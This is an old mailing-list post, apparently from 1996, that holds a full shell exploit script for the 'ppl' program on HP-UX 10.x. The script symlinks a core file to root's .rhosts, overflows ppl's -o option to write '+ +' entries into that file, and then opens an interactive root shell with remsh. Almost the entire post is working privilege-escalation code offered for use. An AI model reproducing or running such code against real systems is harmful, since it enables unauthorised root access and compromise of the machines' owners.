|
ppl exploit for HPUX 10.x Stefan Zehl (sec@wg.camelot.de) Sun, 3 Nov 1996 17:53:13 GMT #!/bin/ksh # ppl exploit, second part - SOD 15Oct96 # not all buffer overruns need to force an address into the PC # works on 10.X, too, oddly enough. - Script Junkie #HOST='localhost' #USER=`whoami` HOST="+" USER="+" cd /tmp rm core 2> /dev/null ln -s ~root/.rhosts core AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa' STUFF=`echo "${AAA}\n${HOST} ${USER}"` ppl -o "${STUFF}" rm core remsh localhost -l root sh -i